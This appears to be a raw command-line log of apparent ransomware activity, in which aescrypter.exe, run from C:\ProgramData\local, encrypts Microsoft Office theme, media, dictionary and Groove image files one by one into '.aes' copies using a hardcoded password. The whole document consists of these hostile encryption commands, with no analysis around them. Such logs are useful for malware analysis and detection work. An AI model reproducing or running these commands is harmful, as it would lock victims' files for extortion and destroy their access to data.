C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Paper.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Paper.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Perspective.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Perspective.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Pushpin.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Pushpin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Slipstream.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Slipstream.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Solstice.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Solstice.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Technic.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Technic.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Thatch.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Thatch.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Trek.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Trek.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Urban.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Urban.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Verve.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Verve.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Waveform.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Waveform.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Adjacency.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Adjacency.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Angles.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Angles.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Apex.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Apex.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Apothecary.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Apothecary.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Aspect.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Aspect.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Austin.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Austin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Black Tie.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Black Tie.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Civic.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Civic.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Clarity.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Clarity.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Composite.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Composite.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Concourse.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Concourse.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Couture.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Couture.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Elemental.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Elemental.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Equity.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Equity.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Essential.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Essential.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Executive.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Executive.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Flow.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Flow.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Foundry.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Foundry.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Grid.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Grid.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Hardcover.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Hardcover.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Horizon.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Horizon.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Median.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Median.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Metro.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Metro.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Module.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Module.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Newsprint.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Newsprint.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office 2.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office 2.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic 2.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic 2.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Opulent.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Opulent.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Oriel.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Oriel.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Origin.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Origin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Paper.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Paper.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Perspective.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Perspective.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Pushpin.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Pushpin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Slipstream.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Slipstream.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Solstice.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Solstice.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Technic.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Technic.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Thatch.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Thatch.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Trek.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Trek.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Urban.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Urban.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Verve.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Verve.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Waveform.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Waveform.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0284916.JPG.aes" "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0284916.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0302827.JPG.aes" "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0302827.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0302953.JPG.aes" "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0302953.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG.aes" "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\Bibliography\BIBFORM.XML.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\Bibliography\BIBFORM.XML" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\CT_ROOTS.XML.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\CT_ROOTS.XML" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\arrow.png.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\arrow.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\gradient.png.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\gradient.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTFORM.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTFORM.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.XLS.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.XLS" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.XLS.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.XLS" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHKEY.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHKEY.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLEX.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLEX.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLTS.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLTS.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHPHN.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHPHN.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHSRN.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHSRN.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\MSOSEC.XML.aes" "C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\MSOSEC.XML" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\ENGDIC.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\ENGDIC.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\ENGIDX.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\ENGIDX.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\EXLIRM.XML.aes" "C:\Program Files (x86)\Microsoft Office\Office14\EXLIRM.XML" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\EXLIRMV.XML.aes" "C:\Program Files (x86)\Microsoft Office\Office14\EXLIRMV.XML" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CalendarToolIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CalendarToolIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CalendarToolIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CalendarToolIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\ChessIconImages.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\ChessIconImages.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\ChessIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\ChessIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CreateSpaceImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CreateSpaceImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CreateSpaceImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CreateSpaceImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataListIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataListIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataListIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataListIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DiscussionToolIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DiscussionToolIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DiscussionToolIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DiscussionToolIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
